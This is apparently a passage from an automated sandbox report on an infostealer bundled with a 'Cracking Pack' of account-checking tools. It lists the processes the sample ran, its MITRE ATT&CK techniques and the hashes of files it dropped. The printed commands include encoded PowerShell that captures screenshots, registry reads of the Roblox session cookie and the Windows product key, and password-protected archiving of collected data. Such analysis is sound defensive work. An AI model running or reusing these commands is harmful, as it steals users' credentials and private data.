fQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:6960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        
        PID:6736
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\po5hobq2\po5hobq2.cmdline"
        6⤵
        
        PID:1008
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED13.tmp" "c:\Users\Admin\AppData\Local\Temp\po5hobq2\CSC5BAA97CBD709403CB057EF899A9A74D0.TMP"
        7⤵
        
        PID:6360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6012
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4968
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3932
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7912
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6156
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 7404"
      4⤵
      PID:884
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7404
        5⤵
        Kills process with taskkill
        
        PID:1412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:8068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:7856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4844
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4500
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:7216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe a -r -hp"adrik123adi" "C:\Users\Admin\AppData\Local\Temp\g4FEI.zip" *"
      4⤵
      PID:2064
    - - C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI78882\rar.exe a -r -hp"adrik123adi" "C:\Users\Admin\AppData\Local\Temp\g4FEI.zip" *
        5⤵
        Executes dropped EXE
        
        PID:8064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:5600
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:4352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:5936
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:7244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5332
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:7976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:7704
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:7516
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:8112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:6712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:4476

C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\Aura_protected.exe
"C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules\AURA AIO CHECKER 30 Modules\AURA AIO CHECKER 30 Modules\Aura_protected.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2272

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Cracking Pack\" -spe -an -ai#7zMap19472:88:7zEvent28949
1⤵
- Suspicious use of FindShellTrayWindow
PID:6932

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Woxy 3.0+166 Config updated 2023\" -spe -an -ai#7zMap4646:126:7zEvent30782
1⤵
- Suspicious use of FindShellTrayWindow
PID:5772

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Cracking Pack\Password.txt
1⤵
PID:2452

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\" -spe -an -ai#7zMap27933:116:7zEvent8593
1⤵
- Suspicious use of FindShellTrayWindow
PID:372

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Proxy tools\Proxies\" -spe -an -ai#7zMap3872:156:7zEvent22637
1⤵
- Suspicious use of FindShellTrayWindow
PID:5876

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1680

C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Proxy tools\Proxies\GatherProxy\Gather Proxy.exe
"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Proxy tools\Proxies\GatherProxy\Gather Proxy.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:1524

C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Proxy tools\Proxies\Kidux Proxy Scraper\Kidux Proxy Scraper v1.0.2.exe
"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Proxy tools\Proxies\Kidux Proxy Scraper\Kidux Proxy Scraper v1.0.2.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3676

C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Proxy tools\Proxies\uProxy\uProxy Tool.exe
"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Proxy tools\Proxies\uProxy\uProxy Tool.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:6672
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
  dw20.exe -x -s 2996
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:7796

C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Checkers\Netflix Checker v0.2.1.exe
"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Checkers\Netflix Checker v0.2.1.exe"
1⤵
- Executes dropped EXE
PID:7260

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\configs\openbullet config\" -spe -an -ai#7zMap13914:168:7zEvent6536
1⤵
- Suspicious use of FindShellTrayWindow
PID:1036

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5616

C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Dumping\Dumping\SQLi Dumper v.8.3 - Copy\SQLi Dumper.exe
"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Dumping\Dumping\SQLi Dumper v.8.3 - Copy\SQLi Dumper.exe"
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:6204

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Generator\Discord Nitro generator & checker\" -spe -an -ai#7zMap24566:204:7zEvent22168
1⤵
- Suspicious use of FindShellTrayWindow
PID:6256

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Generator\Discord Nitro generator & checker\start.bat" "
1⤵
PID:7740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Generator\Discord Nitro generator & checker\install_and_run.bat" "
1⤵
PID:7272

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\7beba063f8c540c0b755c0e98ffb657a /t 7888 /p 6204
1⤵
PID:6416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Generator\Discord Nitro generator & checker\install_and_run.bat" "
1⤵
PID:6688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Generator\Discord Nitro generator & checker\install_and_run.bat" "
1⤵
PID:7984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Generator\Discord Nitro generator & checker\install_and_run.bat"
1⤵
PID:5484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Generator\Discord Nitro generator & checker\start.bat" "
1⤵
PID:5880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Cracking Pack\Cracking Pack\Generator\Discord Nitro generator & checker\start.bat" "
1⤵
PID:6528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b9569e123772ae290f9bac07e0d31748

SHA1
5806ed9b301d4178a959b26d7b7ccf2c0abc6741

SHA256
20ab88e23fb88186b82047cd0d6dc3cfa23422e4fd2b8f3c8437546a2a842c2b

SHA512
cfad8ce716ac815b37e8cc0e30141bfb3ca7f0d4ef101289bddcf6ed3c579bc34d369f2ec2f2dab98707843015633988eb97f1e911728031dd897750b8587795

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eeaa8087eba2f63f31e599f6a7b46ef4

SHA1
f639519deee0766a39cfe258d2ac48e3a9d5ac03

SHA256
50fe80c9435f601c30517d10f6a8a0ca6ff8ca2add7584df377371b5a5dbe2d9

SHA512
eaabfad92c84f422267615c55a863af12823c5e791bdcb30cabe17f72025e07df7383cf6cf0f08e28aa18a31c2aac5985cf5281a403e22fbcc1fb5e61c49fc3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
456B

MD5
d4d0f8b593cfce36e987fe2d3a661575

SHA1
3b3ddfd3c4f4d85c2530fced1596f6d6276b1104

SHA256
3da47948676dfd9c97e08e3507ecba099f287cdde7e58cc63a996b8335611e66

SHA512
96c33a75272f1f8fb4b0c008aa5cea6f5b13141e5f4ad15947158bf714498f34ecf2e398d4f2529bd4820653567f5b95c06d2145f6afa074b4e7ebffa5aceb70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
537B

MD5
6080ab6ad0b42d7bc6307e7814994c19

SHA1
58f0ac4528deea1c081ee2cae31122eae18c9199

SHA256
47367e35cfc56c0e3248f4b085461c9ff90b188a6b8b6cad45bdbb0c0f6a8572

SHA512
ebac7526a3e0e63ab70f21571531279af22210e08d6cb8c1588ee2e2575279dae210e1ac1df9085d5c12d8c1bf7773638e619a9c110fbc6fccf99ee08a789050

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e8dc026e9fb57b6c5f462ffd63b397d5

SHA1
8862717ee36136773474b3b4f9bbe0b045ae41d3

SHA256
cb84332c069cb26877ec00ad8199eecd966537d3551514acdca2fe2ff63613a1

SHA512
8407960add9777190dd6febf840d20afdc7931dccf0f173e7f6e5ee64e0074160a3522e914c538590965d8f61d4e107bef5a393b45ce985bf5ffa28404f9e05c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e67871102612cd52dba78fc401b6458a

SHA1
4628f427741d43b6c3abadcd85a6c74bd9a84ce9

SHA256
948b8207e6ddbe1f53a13c7c2d06d67a37753cbbb467233c7d8ae9e4753a2bc2

SHA512
f35ddb056a359a95a1e59d48a14a8deff004e3f4ea4c559d576469d56956d7ff3b1eed8f2edc073f6346d0edb382a0f2472d15ce63218f150a9af003099dbd41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
1c7043216884a541765e874ba205bdaf

SHA1
651188904acbbac2a566cd433cfdb7f61428b9aa

SHA256
4668d24dd6f5af245a9aa520c109cbd9324ce8e103bb49782464db5d123b53bb

SHA512
4328e737ee054980660121a5f3c8931dced916de80eda1e3499249b8eeb7da165306c0587336fcb0da7f00c1f829edb660c0d00c72e054943b09a4c9caa6ce62

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\illkw0pr.default-release\activity-stream.discovery_stream.json

Filesize
45KB

MD5
66e8b67ca2d66818052c9628f2ffd5f7

SHA1
53a70d9005f0abf3f090bd07c73b26cc9ca5b292

SHA256
6289db3801aa36628106abe013bd3fe210838578c2413c19b4083274f55ed526

SHA512
343f65764804f302c389dc6157b38807412e3d3adcaf9afcb1e927aef2ea32256bb0f062fba328eb2d140ae1dd9a0c02bbc61742d995f0acea65ec5babda0901

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\illkw0pr.default-release\cache2\doomed\5873

Filesize
72KB

MD5
5318723f668c726dfa1ea872f52acdfc

SHA1
95fdfd7f099b6086d63a60545b99ca7b6ee29188

SHA256
3c66acd346adc10b222c52dd2b757f5c388fc2dac1703eea340048f72dd31b76

SHA512
e4df4ed69cefa5f978b973eab9b51101c236739c6b67e1ddff26e1a011824307575f0edecbe5ac8de21af0d4d6aedf2088230dd750b2fb97eade5555a6216e65

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\illkw0pr.default-release\cache2\entries\03A7CC66A2177E350E16643C36DB66BDCE4B3B36

Filesize
42KB

MD5
19fe3bd767af3a6c78a51311cd95c573

SHA1
7fd1f5e728e38497a34885be3316da2126946f20

SHA256
d5255da0d02ae09046a959e3882eb083ea478e0ed830675e62201a869ed20d2a

SHA512
ff47b518078c7e79e7e8e6a94e3037101b2224f3bad5bca66c8cd38aadb0dcfca1773bf155979dba787782fe4c9f5c1db123d11cf20e84e40c33ec7e22bacf6d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\illkw0pr.default-release\cache2\entries\07A15204CA42DE2454C4315171D414CA094AAD6A

Filesize
18KB

MD5
5e33e312b61080e168d919d333f1f91a

SHA1
ab217965bfb666d14c8492d045e3c16a23555a96

SHA256
41a6460ddd06cb409290d5888c2c3c83b8e14d1f8b42b82be7fcc4f16b57686f

SHA512
ccbbabf64d6b216dc01acbb45a9eb81dbd06a22505bcf4429251f3f2d99dd5da73de21e1c6a6cd7cd1ad5ba9277bac0fc62e63ec89b0d08a8f1b670d09ee80b3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\illkw0pr.default-release\cache2\entries\07E0EA21C12586FA51B0E8D0C4B7D3547023D15C

Filesize
1.4MB

MD5
388965cb4162f3779533c48e86f01ba9

SHA1
35dae6dea840b54d60ace23dd1adf784f4b0de1d

SHA256
26fb10035b1b57454f70effdcd7b86302ba34a395031b9a29401b00d4077d6cc

SHA512
f6109f38b284cf01d0626339369faaceb6b7eff2b76ae8f6f63e1f939e510c0483784100b6d14d59e40af1d887f44af5e4c96c34b2b5121c52af023fe0dea7ec

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\illkw0pr.default-release\cache2\entries\08A256C122CC4B6163C84EE1CF3D0E2C8CD28A44

Filesize
237KB

MD5
6da96becf6eb5f18e4f08971c26f82c8

SHA1
ee0494d770a93e06218d8f6c7a737b68d773f24f

SHA256
6036bc9f5212f7679a028dfa78f8241a15a3eabb6ae622f3c44d9dd71fb04b8c

SHA512
ebf99d2e2fb25aff48171668bbc1856364c345157437f660f9de54b2fd39a94f8c11e9c2202c1216bac2a1b9353a4359c5da4973d2ef51f489d545a8c314206d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\illkw0pr.default-release\cache2\entries\0C18A63D07422C5BBF14C42DF4253232CC926410

Filesize
55KB

MD5
653f6b6ea9d531fc518fbdaa7648053a

SHA1
91b7a23b78257bf7ae7053d14b4d6724ec4ed7f5

SHA256
